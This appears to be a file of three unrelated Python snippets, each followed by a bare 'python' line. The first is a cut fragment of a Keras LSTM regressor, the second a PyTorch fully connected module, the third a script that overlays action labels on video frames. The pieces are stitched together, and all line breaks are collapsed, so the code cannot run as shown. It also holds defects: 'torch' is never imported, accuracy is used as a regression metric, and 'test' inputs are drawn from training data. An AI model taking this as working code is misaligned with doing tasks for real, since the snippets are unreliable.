regressor.add(Dropout(0.5)) regressor.add(Dense(units=1)) regressor.compile(optimizer='adam', loss='mean_squared_error', metrics=['accuracy']) regressor.fit(X_train, y_train, epochs=15, batch_size=10) # prepare test set training_set = pd.DataFrame(training_set) test_set = pd.DataFrame(test_set) # 6*10 past_60_seconds = training_set.tail(6) test_set = past_60_seconds.append(test_set, ignore_index=True) X_test, y_test = [], [] test_set = np.array(test_set) for i in range(6, test_set.shape[0] - 6): X_test.append(test_set[i - 6:i]) y_test.append(test_set[i, 8]) X_test = np.array(X_test) y_test = np.array(y_test) X_test_0 = X_train[0] X_test_0 = np.array(X_test_0) X_test_0 = X_test_0.reshape(1, 6, 11) y_pred_0 = regressor.predict(X_test_0) X_test_1 = X_train[1] X_test_1 = np.array(X_test_1) X_test_1 = X_test_1.reshape(1, 6, 11) y_pred_1 = regressor.predict(X_test_1) X_test_2 = X_train[2] X_test_2 = np.array(X_test_2) X_test_2 = X_test_2.reshape(1, 6, 11) y_pred_2 = regressor.predict(X_test_2) y_pred = regressor.predict(X_test)
python
import torch.nn as nn from MyPyTorchAPI.CustomActivation import * class FCCov(torch.nn.Module): def __init__(self, fc_input_size): super().__init__() self.fc = nn.Sequential( nn.Linear(fc_input_size, 512), nn.BatchNorm1d(512), nn.PReLU(), nn.Linear(512, 64), nn.BatchNorm1d(64), nn.PReLU(), nn.Linear(64, 64), nn.BatchNorm1d(64), Sigmoid(a=0.1, max=1), nn.Linear(64, 6)) def forward(self, x): x = self.fc(x) return x
python
#!/usr/bin/env python import matplotlib.pyplot as plt import os import imageio import numpy as np import cv2 from tqdm import tqdm_notebook as tqdm import scipy.misc from generator import read_videofile_txt import os import shutil from generator import build_label2str from predict_and_save_kitty import extract_bbox_for_line import cv2 def save_vid_with_labels(kitty_folder, video_path, frame_output_folder, label_csv, id_format_colon=False, verbose=True): '''Saves a video frame by frame where a bounding box is drawn around the detected persons and an action label is provided. Needs a kitty folder where the kitty files have action labels.''' vid = imageio.get_reader(video_path, 'ffmpeg') total_frames=len(vid) kitty_files = sorted(os.listdir(kitty_folder)) frame_idxs = [int(n.split('.')[0].split('_')[-1])-1 for n in kitty_files] if verbose: print('Video loaded, len frame_idxs:', len(frame_idxs), 'len vid:', len(vid)) # Get label to string dict label2str_dict = build_label2str(label_csv) label2str_dict[-1] = 'undefined' print('label2str_dict',label2str_dict) if not os.path.exists(frame_output_folder): os.mkdir(frame_output_folder) for num in tqdm(range(total_frames)): # check for valid frame number # if num >= 0 & num <= totalFrames: # # set frame position # cap.set(cv2.CAP_PROP_POS_FRAMES,myFrameNumber) # ret, img = cap.read() # print('ret:',ret) img = vid.get_data(num) if num in frame_idxs: # Read txt file txt_line_list = read_videofile_txt(os.path.join(kitty_folder,kitty_files[num])) # print('txt_line_list:',txt_line_list) # Get all bboxes for this frame for j,line in enumerate(txt_line_list): # Extract id if id_format_colon: id_ = int(float(line.split(' ')[0].split(':')[-1])) else: id_ = int(float(line.split(' ')[1])) # Extract action label act_label = int(float(line.split(' ')[-1])) if act_label == -1: font_size=0.5 font_color = (200,200,0) bbox_color = (100,0,0) else: font_size=0.8 font_color = (255,255,0) bbox_color = (255,0,0) text_label = label2str_dict[act_label] # print('text_label:', text_label) # Getting bbox crop, bbox = extract_bbox_for_line(line, img, idx_bbox=3, margin=0.0, show=False, debug=False, k=1.0) left, right, top, bottom = bbox cv2.rectangle(img, (left,top), (right,bottom), bbox_color, 2) cv2.putText(img, text_label, (left, top), cv2.FONT_HERSHEY_SIMPLEX, font_size, font_color, lineType=cv2.LINE_AA) # if not num%10: # plt.figure() # plt.imshow(img) # plt.show() imageio.imwrite(os.path.join(frame_output_folder, str(num)+'.jpg'), img) if __name__ == "__main__": save_vid_with_labels('../../../p2_metropolis/tmp/cfosco/VIDEOS/KITTI_CFOSCOnyc_c0110_2/with_action_labels', '../../../p2_metropolis/tmp/cfosco/VIDEOS/nyc_c0110_2.mp4', frame_output_folder = '../tmp_vid', label_csv='../../../nfs_share/datasets/IVA_Videos/crops_mixed_aux/labels_5.csv')
python